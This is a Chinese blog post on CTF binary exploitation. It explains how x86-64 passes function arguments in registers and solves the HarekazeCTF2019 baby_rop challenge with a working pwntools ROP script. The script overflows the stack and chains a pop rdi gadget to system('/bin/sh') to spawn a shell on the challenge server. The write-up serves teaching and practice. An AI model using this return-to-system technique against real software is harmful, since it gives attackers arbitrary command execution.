PWN 64位程序寄存器的使用

本文最后更新于 556 天前，其中的信息可能已经有所发展或是发生改变。

刷题多了对寄存器开始有着一定的了解了，这篇文章就来总结一下。

六十四位汇编

当参数少于7个时， 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时， 前 6 个与前面一样， 但后面的依次从 “右向左” 放入栈中，即和32位汇编一样。 参数个数大于 7 个的时候 H(a, b, c, d, e, f, g, h); a->%rdi, b->%rsi, c->%rdx, d->%rcx, e->%r8, f->%r9 h->8(%esp) g->(%esp) call H

也就是说在六十四位程序的payload构造过程中如果需要传入参数就需要对应的寄存器地址，如一个参数就需要进行寻找pop rdi地址

例题分析

[HarekazeCTF2019]baby_rop

分析

printf函数中的v4没做长度限制，很明显的栈溢出。

程序string中包含/bin/sh，但是没有函数调用，这里用pop rdi调用

payload

from pwn import *

context.log_level = 'debug'
p = remote("node4.buuoj.cn",28395)
elf = ELF('./babyrop')

system_addr = elf.symbols['system']
pop_rdi = 0x400683
binsh_addr =  0x601048

payload = b'a' * (0x10 + 8) +  p64(pop_rdi) + p64(binsh_addr) +p64(system_addr)
p.sendline(payload)
p.interactive()

参考资料

64位汇编参数传递：http://abcdxyzk.github.io/blog/2012/11/23/assembly-args/

浏览量: 262